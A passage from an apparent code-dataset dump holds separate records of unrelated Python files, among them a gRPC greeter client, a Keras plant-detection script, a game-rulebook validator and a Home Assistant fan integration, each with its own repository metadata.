bool\n \"\"\"\n hex_n = hex(number)[2:]\n if hex_n.endswith('L'):\n hex_n = hex_n[:-1]\n hex_n = cast_to_bin(hex_n)\n generated = backend._lib.BN_new()\n bn_pp = backend._ffi.new('BIGNUM **', generated)\n err = backend._lib.BN_hex2bn(bn_pp, hex_n)\n if err == 0:\n backend._lib.BN_clear_free(generated)\n raise RuntimeError('Failed to read BIGNUM from hex string!')\n result = backend._lib.BN_is_prime_ex(generated, backend._lib.BN_prime_checks_for_size(int(len(hex_n) * 8)), backend._ffi.NULL, backend._ffi.NULL)\n backend._lib.BN_clear_free(generated)\n if result == 1:\n return True\n return False","sub_path":"pycfiles/anydex-0.1.0-py3-none-any/cryptography_wrapper.py","file_name":"cryptography_wrapper.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"4342858","text":"#!/usr/bin/env python\n\"\"\"\nUpdate version string in Info.plist on iOS project.\n\"\"\"\nfrom __future__ import print_function, unicode_literals\n\nimport os\n\nROOT_PATH = os.path.dirname(os.path.dirname(__file__))\n\nINFO_PLIST_PATH = os.path.join(ROOT_PATH, 'sukima/sukima-Info.plist')\nBL_INFO_PLIST_PATH = os.path.join(ROOT_PATH, 'blchan/blchan-info.plist')\n\nPROJECT_FILE_PATH = os.path.join(ROOT_PATH, 'sukima.xcodeproj/project.pbxproj')\n\nPROFILE_APP_STORE = 'PROVISIONING_PROFILE = \"93df057b-6851-4352-86f4-4327af4aa61f\";'\nPROFILE_AD_HOC = 'PROVISIONING_PROFILE = \"160c9225-8a26-4d4a-ac54-f0c0788a4ab8\";'\n\nBL_PROFILE_APP_STORE = 'PROVISIONING_PROFILE = 
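# --- editor's sketch: the safe-prime property checked via OpenSSL above ---
# generate_safe_prime() asks BN_generate_prime_ex for a prime p such that
# (p - 1) / 2 is also prime. The property itself, expressed with sympy
# (sympy is an assumption here, not a dependency of the record above):
from sympy import isprime

def is_safe_prime(p):
    return isprime(p) and isprime((p - 1) // 2)

assert is_safe_prime(23)  # 23 and 11 are both prime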
\"8b85505a-24f3-4dd3-9403-58d3d2af07d4\";'\nBL_PROFILE_AD_HOC = 'PROVISIONING_PROFILE = \"4233bc1e-8fec-489a-8575-f7d14cebb82d\";'\n","sub_path":"sukima-ios/tasks/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"106342543","text":"# noinspection PyPackageRequirements\nimport asyncio\nimport os\nfrom difflib import SequenceMatcher\n\nimport discord\nfrom discord.ext import commands\n\nfrom utils import helpers\nimport asyncio\nimport functools\n\nimport psutil\n\nfrom utils import Server as srv\nfrom utils import sensor\n\n\nclass Game(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n self.bot.loop.create_task(self.check_server_running())\n self.bot.loop.create_task(self.get_current_server_status())\n\n @staticmethod\n def wait_or_when_cancelled(process):\n bot_proc = psutil.Process()\n while True:\n try:\n process.wait(timeout=1)\n return\n except psutil.TimeoutExpired:\n if bot_proc.is_running():\n continue\n else:\n return\n\n async def check_server_running(self):\n await self.bot.wait_until_ready(1)\n while not self.bot.is_closed():\n try:\n await asyncio.sleep(1)\n process, data = sensor.get_game_info()\n if process and data:\n self.bot._game_stopped.clear()\n self.bot._game_running.set()\n self.bot.gameinfo = data\n\n self.bot.bprint(f\"Server Status | Now Playing: {data['name']}\")\n await self.bot.loop.run_in_executor(None, functools.partial(self.wait_or_when_cancelled, process))\n self.bot.bprint(f\"Server Status | Offline\")\n\n self.bot._game_running.clear()\n self.bot._game_stopped.set()\n self.bot.gameinfo = None\n except ProcessLookupError:\n await asyncio.sleep(5)\n continue\n except ValueError:\n await asyncio.sleep(5)\n continue\n except AttributeError:\n await asyncio.sleep(5)\n continue\n except Exception as e:\n print(str(type(e)) + \": \" + str(e))\n print(\"This is from the server checker\")\n\n async def get_current_server_status(self):\n await self.bot.wait_until_game_running(1)\n self.bot.game = None\n while not self.bot.is_closed():\n # If game is running upon instantiation\n if self.bot.is_game_running:\n process, data = sensor.get_game_info()\n self.bot.game = srv.generate_server_object(self.bot, process, data)\n await self.bot.wait_until_game_stopped(2)\n\n # Elif no game is running upon instantiation:\n elif self.bot.is_game_stopped:\n self.bot.game = None\n await self.bot.change_presence()\n await self.bot.wait_until_game_running(2)\n\n\ndef setup(bot):\n bot.add_cog(Game(bot))\n","sub_path":"modules/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"418945051","text":"import datetime as dt\n\n\ndef dates_between(sdate, edate):\n \"\"\"\n Procedure dates_between\n -----------------------\n Ths procedure returns all of the dates between *sdate* and *edate.\n\n Parameters\n ----------\n sdate: str\n The string containing the start date. The string is formatted\n YYYYMMDD.\n edate: str\n The string containing the end date. 
The string is formatted\n YYYYMMDD.\n\n Returns\n -------\n all_dates: array of datetimes\n The array containing the dates between *sdate* and *edate*\n \"\"\"\n\n days = dt.datetime.strptime(edate, '%Y%m%d') - \\\n dt.datetime.strptime(sdate, '%Y%m%d')\n\n all_dates = [dt.datetime.strptime(sdate, '%Y%m%d') + dt.timedelta(days=d)\n for d in range(days.days + 1)]\n\n return all_dates\n","sub_path":"act/utils/datetime_utils.py","file_name":"datetime_utils.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"337433252","text":"#!/usr/bin/env python\n# Copyright 2015, Google Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"The Python implementation of the GRPC helloworld.Greeter client.\"\"\"\n\nfrom __future__ import print_function\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport time\n\nimport grpc\n\nimport greeter_pb2\nimport greeter_pb2_grpc\n\n\ndef run(flags):\n # The deadline is absolute - time taken by wait_for_ready is not available to\n # the RPC.\n deadline = time.time() + flags.deadline_ms/1000.0\n\n logging.info('Creating channel to greeter server at %s',\n flags.greeter_server)\n channel = grpc.insecure_channel(flags.greeter_server)\n if flags.wait_for_ready:\n logging.info('Waiting for channel to become ready...')\n try:\n grpc.channel_ready_future(channel).result(timeout=deadline - time.time())\n except:\n # Ignoring timeouts and other errors here.\n pass\n\n logging.info('Creating Greeter stub.')\n stub = greeter_pb2_grpc.GreeterStub(channel)\n\n logging.info('Sending request')\n try:\n response = stub.SayHello(greeter_pb2.HelloRequest(name=flags.user,\n locale=flags.locale),\n timeout=deadline - time.time())\n logging.info('Greeting received: %s', response.message)\n print ('Greeting received: %s' % response.message)\n except grpc.RpcError:\n logging.exception('Failed to fetch greeting:')\n print ('Failed to fetch greeting.')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='The 
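# --- editor's note: dates_between above is inclusive on both ends ---
# The timedelta between the parsed dates yields N days and range(N + 1) adds
# the end date back in, e.g.:
#
#   dates_between('20200101', '20200103')
#   -> [datetime(2020, 1, 1), datetime(2020, 1, 2), datetime(2020, 1, 3)]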
greeter client')\n parser.add_argument('--user', default='world',\n help='The user to greet!')\n parser.add_argument('--greeter_server', default='localhost:50051',\n help='Server address of the greeter server.')\n parser.add_argument('--locale', default='en_US',\n help='The locale for the greeting.')\n parser.add_argument('--deadline_ms', type=int, default=20*1000,\n help='Deadline in milliseconds.')\n parser.add_argument('--wait_for_ready',\n type=lambda a: a[0].lower() not in ('0', 'f', 'n'),\n default=True,\n help=('Whether to wait for the backend to become '\n 'available. If false, fails fast.'))\n parser.add_argument('--log_dir', default='',\n help='Server address of the translation server.')\n flags = parser.parse_args()\n logging.basicConfig(\n filename=os.path.join(flags.log_dir, 'greeter_client.py.INFO'),\n format=('%(asctime)s.%(msecs)d %(levelname)s %(module)s:%(lineno)s '\n '%(message)s'),\n datefmt='%Y%m%d %H:%M:%S',\n level=logging.INFO)\n run(flags)\n","sub_path":"grpc/build/greeter_client.py","file_name":"greeter_client.py","file_ext":"py","file_size_in_byte":4189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"218159360","text":"import numpy as np\r\nimport os\r\nfrom os.path import join\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport matplotlib.pyplot as plt\r\nfrom keras.models import Sequential, model_from_json\r\nfrom keras.layers import Dense, Flatten, BatchNormalization\r\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\r\nfrom keras.utils import np_utils\r\nfrom keras.callbacks import TensorBoard, EarlyStopping\r\nimport scipy.ndimage as sn\r\nfrom scipy.misc import imresize\r\nimport time\r\nfrom Utils import read_img, write_txt, std_color\r\nimport argparse\r\nfrom csv2shp import csv2shp\r\nimport cv2\r\nfrom random import choice\r\nimport operator\r\nimport pandas as pd\r\n\r\n# import tensorflow as tf\r\n# from keras.backend.tensorflow_backend import set_session\r\n# config = tf.ConfigProto()\r\n# config.gpu_options.per_process_gpu_memory_fraction = 0.5\r\n# set_session(tf.Session(config=config))\r\n\r\ndef load_image(img_path, patch_radius, resize_rate, plant_color):\r\n img_source = read_img(img_path)\r\n img = np.copy(img_source)\r\n\r\n if not resize_rate == 1:\r\n height, width = img_source.shape[:2]\r\n img = cv2.resize(img_source, (int(width*resize_rate), int(height*resize_rate)))\r\n if len(img.shape) == 3:\r\n pad_width = ((patch_radius, patch_radius), (patch_radius, patch_radius), (0, 0))\r\n else:\r\n pad_width = ((patch_radius, patch_radius), (patch_radius, patch_radius))\r\n img_pad = np.lib.pad(img, pad_width, 'symmetric')\r\n img_pad = std_color(img_pad, plant_color)\r\n return img, img_pad/255, img_source\r\n\r\ndef plant_detect(img_path, model_name, plant_distance, row_distance, threshold, save_img_path = 'default', info = 1, display = 1):\r\n start = time.clock()\r\n\r\n dirname = os.path.split(img_path)[0]\r\n basename = os.path.split(img_path)[1]\r\n filename = os.path.splitext(basename)[0]\r\n ext = os.path.splitext(basename)[1]\r\n if ext == '.tif' or ext == '.tiff':\r\n plant_id = os.path.split(dirname)[1]\r\n show_img = 0\r\n else:\r\n plant_id = os.path.split(os.path.split(dirname)[0])[1]\r\n show_img = 1\r\n if display == 0:\r\n show_img = 0\r\n model_path = join('models', model_name)\r\n\r\n path = join('tmp', plant_id, 'result')\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n\r\n json_file = open(model_path + '.json', 'r')\r\n loaded_model_json = 
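# --- editor's sketch: the absolute-deadline pattern from greeter_client above ---
# The script converts --deadline_ms into one absolute deadline and derives
# every timeout from it, so time spent in wait_for_ready is charged against
# the RPC. A reusable version (clamped so a timeout is never negative):
import time

def make_deadline(deadline_ms):
    deadline = time.time() + deadline_ms / 1000.0
    def remaining():
        return max(deadline - time.time(), 0.0)
    return remaining

# remaining() would be passed as timeout= to channel_ready_future().result()
# and to stub.SayHello(...), mirroring the script's deadline - time.time().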
json_file.read()\r\n json_file.close()\r\n model = model_from_json(loaded_model_json)\r\n model.load_weights(model_path +'.h5')\r\n\r\n df = pd.read_csv('plant_info.csv')\r\n df_plant = df[df['plant_id'] == int(plant_id)]\r\n resize_rate = float(df_plant['resize_rate'])\r\n resize_rate = min(resize_rate, 1.5)\r\n plant_color = int(df_plant['plant_color'])\r\n\r\n patch_size = 45\r\n patch_radius = int((patch_size-1)/2)\r\n channel = 3\r\n output_shape = int(model.output.shape[3])\r\n labels = [1]\r\n num_label = len(labels)\r\n detect_size = 1000\r\n input_detect_size = detect_size + 2 * patch_radius\r\n\r\n img, img_pad, img_source = load_image(img_path, patch_radius, resize_rate, plant_color)\r\n if info:\r\n print(img_path, img_pad.shape)\r\n\r\n rows, cols = img.shape[:2]\r\n rows_pad, cols_pad = img_pad.shape[:2]\r\n prob_map = np.zeros([rows, cols, num_label])\r\n max_map = np.zeros([rows, cols])\r\n max_index = np.zeros([rows, cols]).astype(np.uint8)\r\n if max(img.shape) < detect_size:\r\n input_image = np.expand_dims(img_pad, axis = 0)\r\n prob = model.predict(input_image)\r\n prob = np.squeeze(prob)\r\n prob_map = prob[:, :, labels]\r\n else:\r\n if np.min(img_pad)<1:\r\n for r in range(0, rows, detect_size):\r\n for c in range(0, cols, detect_size):\r\n rr = min(r+input_detect_size, rows_pad)\r\n cr = min(c+input_detect_size, cols_pad)\r\n input_image = np.zeros((input_detect_size, input_detect_size, 3))\r\n input_image[:rr-r, :cr-c] = img_pad[r:rr, c:cr]\r\n if np.min(input_image)<1:\r\n input_image = np.expand_dims(input_image, axis = 0)\r\n prob = model.predict(input_image)\r\n prob = np.squeeze(prob)\r\n rr = min(r+detect_size, rows)\r\n cr = min(c+detect_size, cols)\r\n prob_map[r:rr, c:cr, :] = prob[:rr-r, :cr-c, labels]\r\n\r\n max_index_temp = prob_map>0.5\r\n max_map_temp = prob_map * max_index_temp\r\n max_map = np.sum(max_map_temp, axis = 2)\r\n max_index = np.dot(max_index_temp, range(1, len(labels)+1))\r\n\r\n sigma = plant_distance/5\r\n prob_gau = sn.gaussian_filter(max_map, sigma, mode='mirror')\r\n prob_fil = sn.rank_filter(prob_gau, -2, footprint=np.ones([plant_distance, plant_distance]))\r\n mask = np.logical_and(prob_gau > prob_fil, max_map >= threshold)\r\n max_index *= mask\r\n\r\n good_hits = []\r\n bad_hits = []\r\n good_hits_temp = []\r\n row_distance /= 2\r\n\r\n for label_id in range(1, num_label+1):\r\n good_hit = []\r\n bad_hit = []\r\n good_hit_temp = []\r\n same_index = (max_index == label_id)\r\n\r\n idx = np.where(same_index > 0)\r\n if row_distance > 0:\r\n for i in range(len(idx[0])):\r\n x = idx[0][i]\r\n y = idx[1][i]\r\n rl = max(int(x-row_distance), 0)\r\n rr = min(int(x+row_distance), rows)\r\n cl = max(int(y-row_distance), 0)\r\n cr = min(int(y+row_distance), cols)\r\n x_resized = int(x/resize_rate)\r\n y_resized = int(y/resize_rate)\r\n if np.sum(same_index[rl:rr,cl:cr]) > 1:\r\n good_hit_temp.append([x,y])\r\n good_hit.append([x_resized,y_resized])\r\n else:\r\n bad_hit.append([x_resized,y_resized])\r\n else:\r\n for i in range(len(idx[0])):\r\n x = idx[0][i]\r\n y = idx[1][i]\r\n x_resized = int(x/resize_rate)\r\n y_resized = int(y/resize_rate)\r\n good_hit_temp.append([x,y])\r\n good_hit.append([x_resized,y_resized])\r\n good_hits += good_hit\r\n good_hits_temp += good_hit_temp\r\n bad_hits += bad_hit\r\n num_good_hit = len(good_hit)\r\n num_bad_hit = len(bad_hit)\r\n if info:\r\n print('Plant {} has {}, {} of them are bad hits'.format(label_id, np.sum(same_index), np.sum(num_bad_hit)))\r\n\r\n good_hits = np.array(good_hits)\r\n 
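# --- editor's sketch: the symmetric padding used by load_image above ---
# The image is padded by patch_radius on every side so that a patch centred
# on a border pixel still has full context; np.lib.pad is an older alias of
# np.pad. For a 3-channel image:
import numpy as np

def pad_for_patches(img, patch_radius):
    pad = ((patch_radius, patch_radius), (patch_radius, patch_radius), (0, 0))
    return np.pad(img, pad, 'symmetric')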
bad_hits = np.array(bad_hits)\r\n\r\n if len(good_hits) > 0:\r\n save_path = os.path.join('tmp', plant_id, 'result', filename + '.txt')\r\n write_txt(save_path, good_hits, way='w')\r\n if len(bad_hits) > 0:\r\n bad_save_path = os.path.join('tmp', plant_id, 'result', filename + '_bad.txt')\r\n write_txt(bad_save_path, bad_hits, way='w')\r\n\r\n if (ext == '.tif' or ext == '.tiff') and show_img == 0:\r\n geo_path = os.path.join('tmp', plant_id, filename) + '.geojson'\r\n csv2shp(save_path, geo_path, img_path)\r\n print('Saved geojson file')\r\n\r\n num_plant = len(good_hits)\r\n print(\"{} detected {} plants.\".format(img_path, num_plant))\r\n if info:\r\n m, s = divmod(time.clock() - start, 60)\r\n h, m = divmod(m, 60)\r\n print(\"Run time: {}:{}:{}\".format(int(h), int(m), int(s)))\r\n\r\n if show_img:\r\n mark_size = 2\r\n plant_region = cv2.inRange(max_map, threshold, 1)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n mask_gray = np.copy(img)\r\n mask_color = np.copy(img_source)\r\n for r in range(rows):\r\n for c in range(cols):\r\n if plant_region[r, c] == 0:\r\n mask_gray[r, c, :] = gray[r, c]\r\n if not resize_rate == 1:\r\n height, width = img_source.shape[:2]\r\n mask_gray = cv2.resize(mask_gray, (width, height))\r\n color_range = range(255)\r\n color = np.zeros([num_label, 3])\r\n for i in range(num_label):\r\n color[i] = [choice(color_range), choice(color_range), choice(color_range)]\r\n\r\n for x, y in good_hits_temp:\r\n index = max_index[int(x),int(y)] - 1\r\n x = int(x/resize_rate)\r\n y = int(y/resize_rate)\r\n mask_gray[x-mark_size:x+mark_size, y-mark_size:y+mark_size] = [0,0,255] #color[index]\r\n mask_color[x-mark_size:x+mark_size, y-mark_size:y+mark_size] = [0,0,255] #color[index]\r\n for x, y in bad_hits:\r\n mask_gray[x-mark_size:x+mark_size, y-mark_size:y+mark_size] = [0,0,0]\r\n mask_color[x-mark_size:x+mark_size, y-mark_size:y+mark_size] = [0,0,0]\r\n\r\n if num_plant > 0:\r\n gap = np.zeros((mask_color.shape[0], 10, 3)).astype(np.uint8)\r\n result = cv2.hconcat((mask_color, gap, mask_gray))\r\n\r\n #plant_size, result = near_neighbor(mask_color, plant_region, local_maximas)\r\n save_path = os.path.join('tmp', plant_id, 'result', filename + '.png')\r\n cv2.imwrite(save_path, result)\r\n if not save_img_path == 'default':\r\n cv2.imwrite(save_img_path, result)\r\n if info:\r\n cv2.namedWindow('result', cv2.WINDOW_NORMAL)\r\n cv2.setWindowProperty(\"result\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\r\n cv2.imshow('result', result)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n return num_plant\r\n\r\ndef near_neighbor(img, plant_region, local_maximas):\r\n row, col = plant_region.shape\r\n checked_map = np.zeros(plant_region.shape)\r\n region_set = []\r\n finish_flags = np.zeros(len(local_maximas))\r\n\r\n iterate = 0\r\n while min(finish_flags) == 0:\r\n for index, (local_maxima, finish_flag) in enumerate(zip(local_maximas, finish_flags)):\r\n if finish_flag == 0:\r\n flag = 0\r\n if iterate == 0:\r\n cx = local_maxima[0]\r\n cy = local_maxima[1]\r\n region_set.append([])\r\n region_set[index].append([cx,cy])\r\n checked_map[cx,cy] = 1\r\n region_set_tmp = list(region_set[index])\r\n for xy in region_set_tmp:\r\n x = xy[0]\r\n y = xy[1]\r\n if x-1>=0 and plant_region[x-1,y]>0 and checked_map[x-1,y] == 0:\r\n region_set[index].append([x-1,y])\r\n checked_map[x-1,y] = 1\r\n flag = 1\r\n if x+10 and checked_map[x+1,y] == 0:\r\n region_set[index].append([x+1,y])\r\n checked_map[x+1,y] = 1\r\n flag = 1\r\n if y-1>=0 and plant_region[x,y-1]>0 and 
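# --- editor's sketch: the peak picking used by plant_detect above ---
# Plant centres are local maxima of the smoothed probability map: a pixel
# counts when it beats the second-largest value (rank -2) in its
# plant_distance x plant_distance neighbourhood and the raw map clears the
# threshold. Minimal version of that non-maximum suppression:
import numpy as np
import scipy.ndimage as sn

def local_maxima(prob_map, plant_distance=20, threshold=0.9):
    sigma = plant_distance / 5
    smoothed = sn.gaussian_filter(prob_map, sigma, mode='mirror')
    footprint = np.ones((plant_distance, plant_distance))
    neighbour = sn.rank_filter(smoothed, -2, footprint=footprint)
    return np.logical_and(smoothed > neighbour, prob_map >= threshold)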
checked_map[x,y-1] == 0:\r\n region_set[index].append([x,y-1])\r\n checked_map[x,y-1] = 1\r\n flag = 1\r\n if y+1<col and plant_region[x,y+1]>0 and checked_map[x,y+1] == 0:\r\n region_set[index].append([x,y+1])\r\n checked_map[x,y+1] = 1\r\n flag = 1\r\n if flag == 0:\r\n finish_flags[index] = 1\r\n iterate += 1\r\n\r\n region_mark = np.zeros(img.shape).astype(np.uint8)\r\n plant_size = np.zeros(len(local_maximas))\r\n color_range = range(255)\r\n mark_size = 1\r\n for index, (local_maxima, region_set) in enumerate(zip(local_maximas, region_set)):\r\n color = [choice(color_range), choice(color_range), choice(color_range)]\r\n plant_size[index] = len(region_set)\r\n if plant_size[index] > 0:\r\n cx = local_maxima[0]\r\n cy = local_maxima[1]\r\n for xy in region_set:\r\n x = xy[0]\r\n y = xy[1]\r\n region_mark[x, y] = color\r\n region_mark[cx-mark_size:cx+mark_size, cy-mark_size:cy+mark_size] = [0, 255, 255]\r\n gap = np.zeros((row, 10, 3)).astype(np.uint8)\r\n result = cv2.hconcat((img, gap, region_mark))\r\n #print(plant_size)\r\n return plant_size, result\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\"--img_path\", type=str, help=\"Image to analyze.\")\r\n parser.add_argument(\"--model_name\", type=str, help=\"Which model to use.\")\r\n parser.add_argument(\"--plant_distance\", type=int, help=\"Distance between plants.\")\r\n parser.add_argument(\"--row_distance\", type=int, help=\"Distance between rows.\")\r\n parser.add_argument(\"--threshold\", type=float, help=\"Threshold to be classified as plants.\")\r\n args = parser.parse_args()\r\n\r\n plant_detect(img_path = args.img_path, model_name = args.model_name,\r\n plant_distance = args.plant_distance, row_distance = args.row_distance,\r\n threshold = args.threshold)\r\n","sub_path":"plant_detect_efficient.py","file_name":"plant_detect_efficient.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"613522378","text":"import json\nimport os\n\nfrom src.website.common import get_component, read_json_file, get_link_skill_req\n\n\ndef check_for_duplicates(components, log):\n def _stringify(item):\n if item['type'] in ['branch', 'ability']:\n return '%s \"%s\" from class \"%s\"' % (item['type'], item['name'], item['class'])\n else:\n return '%s \"%s\"' % (item['type'], item['name'])\n\n seen = dict()\n for component in components:\n if component['name'] in seen:\n log('Warning: %s has same name as %s' % (_stringify(component), _stringify(seen[component['name']])))\n seen[component['name']] = component\n\n\ndef check_for_branch_duplicates(classes, log):\n seen = dict()\n for clazz in classes:\n if 'branches' not in clazz:\n continue\n\n for branch_name in clazz['branches']:\n if branch_name in seen:\n log('Warning: branch \"%s\" from class \"%s\" has same name as branch \"%s\" from class \"%s\"'\n % (branch_name, clazz['name'], branch_name, seen[branch_name]))\n seen[branch_name] = clazz['name']\n\n\ndef check_class_fields(classes):\n base_fields = ['type', 'preview', 'num_requirements', 'known_requirements', 'all_reqs_known']\n full_fields = ['description', 'requirements', 'branches', 'passive', 'abilities']\n\n for clazz in classes:\n if 'name' not in clazz:\n raise Exception('Missing \"name\" field in class, class=%s' % clazz)\n\n for field in base_fields:\n if field not in clazz:\n raise Exception('Expected field \"%s\" to be present in class \"%s\"' % (field, clazz['name']))\n\n if 'flavor_text' in clazz:\n for field in 
full_fields:\n if field not in clazz:\n raise Exception('Expected field \"%s\" to be present in full class \"%s\"' % (field, clazz['name']))\n\n\ndef check_skill_attribute_links(skills, attributes):\n for skill in skills:\n try:\n get_component(skill['attribute'], attributes)\n except KeyError:\n raise Exception('Attribute \"%s\" for skill \"%s\" not found in attributes.json'\n % (skill['attribute'], skill['name']))\n\n\ndef check_class_skill_requirements(classes, skills, log):\n for clazz in classes:\n for skill_req in clazz['known_requirements']:\n if skill_req == get_link_skill_req(skill_req, skills):\n log('Warning: Failed to find corresponding skill for class \"%s\" hint requirement \"%s\"'\n % (clazz['name'], skill_req))\n\n if 'requirements' not in clazz:\n continue\n\n for skill_req in clazz['requirements']:\n if skill_req == get_link_skill_req(skill_req, skills):\n log('Warning: Failed to find corresponding skill for class \"%s\" full description requirement \"%s\"'\n % (clazz['name'], skill_req))\n\n\ndef check_class_ability_links(classes, abilities):\n for ability in abilities:\n try:\n get_component(ability['class'], classes)\n except KeyError:\n raise Exception('Class \"%s\" for ability \"%s\" not found in classes.json'\n % (ability['class'], ability['name']))\n\n for clazz in classes:\n if 'abilities' not in clazz:\n continue\n\n for ability_name in clazz['abilities']:\n try:\n ability = get_component(ability_name, abilities, lambda a: a['class'] == clazz['name'])\n except KeyError:\n raise Exception('Ability \"%s\" in class \"%s\" not found in abilities.json'\n % (ability_name, clazz['name']))\n\n if ability['branch'] not in clazz['branches']:\n raise Exception('Ability \"%s\" in class \"%s\" has branch \"%s\" which is not listed in the class'\n % (ability_name, ability['class'], ability['branch']))\n\n\ndef validate(log):\n log('Validating rulebook files')\n current_path = os.getcwd()\n rulebook_path = os.path.join(current_path, 'rulebook')\n\n try:\n abilities = read_json_file(os.path.join(rulebook_path, 'abilities.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse abilities.json file, %s' % str(e))\n\n try:\n attributes = read_json_file(os.path.join(rulebook_path, 'attributes.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse attributes.json file, %s' % str(e))\n\n try:\n buffs = read_json_file(os.path.join(rulebook_path, 'buffs.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse buffs.json file, %s' % str(e))\n\n try:\n classes = read_json_file(os.path.join(rulebook_path, 'classes.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse classes.json file, %s' % str(e))\n\n try:\n conditions = read_json_file(os.path.join(rulebook_path, 'conditions.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse conditions.json file, %s' % str(e))\n\n try:\n races = read_json_file(os.path.join(rulebook_path, 'races.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse races.json file, %s' % str(e))\n\n try:\n skills = read_json_file(os.path.join(rulebook_path, 'skills.json'))\n except json.JSONDecodeError as e:\n raise Exception('Failed to parse skills.json file, %s' % str(e))\n\n check_for_duplicates(abilities + attributes + buffs + classes + conditions + races + skills, log)\n check_for_branch_duplicates(classes, log)\n check_class_fields(classes)\n check_skill_attribute_links(skills, attributes)\n 
check_class_skill_requirements(classes, skills, log)\n check_class_ability_links(classes, abilities)\n log('Validated rulebook files')\n","sub_path":"src/website/validator.py","file_name":"validator.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"614642482","text":"from setuptools import setup, find_packages\n\nwith open('VERSION') as version_file:\n version = version_file.read().strip()\n\nwith open('README.rst') as f:\n README = f.read()\n\nsetup(\n name='atb_teravm',\n version=version,\n description=\"Package for the ATB framework's teravm library.\",\n long_description=README,\n install_requires=['pytest', 'pytest-html', 'pytest-cov'],\n packages=find_packages(exclude=('tests', 'docs'))\n)","sub_path":"atb-teravm/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"346580811","text":"\"\"\"FAN for nibe.\"\"\"\n\nimport asyncio\nimport logging\nfrom typing import List, Dict, Optional\n\nfrom homeassistant.components.fan import ENTITY_ID_FORMAT, SUPPORT_SET_SPEED, FanEntity\nfrom homeassistant.exceptions import PlatformNotReady\n\nfrom nibeuplink import get_active_ventilations, VentilationSystem, Uplink\n\nfrom . import NibeSystem\nfrom .const import DATA_NIBE, DOMAIN as DOMAIN_NIBE\nfrom .entity import NibeEntity\n\nPARALLEL_UPDATES = 0\n_LOGGER = logging.getLogger(__name__)\nSPEED_AUTO = \"auto\"\nSPEED_BOOST = \"boost\"\n\nNIBE_BOOST_TO_SPEED = {0: SPEED_AUTO, 1: SPEED_BOOST}\nHA_SPEED_TO_NIBE = {v: k for k, v in NIBE_BOOST_TO_SPEED.items()}\n\n\nasync def async_setup_entry(hass, entry, async_add_entities):\n \"\"\"Set up the fan device based on a config entry.\"\"\"\n if DATA_NIBE not in hass.data:\n raise PlatformNotReady\n\n uplink = hass.data[DATA_NIBE].uplink # type: Uplink\n systems = hass.data[DATA_NIBE].systems # type: List[NibeSystem]\n\n entities = []\n\n async def add_active(system: NibeSystem):\n ventilations = await get_active_ventilations(uplink, system.system_id)\n for ventilation in ventilations.values():\n entities.append(NibeFan(uplink, system.system_id, ventilation))\n\n await asyncio.gather(\n *[add_active(system) for system in systems.values()]\n )\n\n async_add_entities(entities, True)\n\n\nclass NibeFan(NibeEntity, FanEntity):\n \"\"\"Nibe Fan.\"\"\"\n\n def __init__(self, uplink: Uplink, 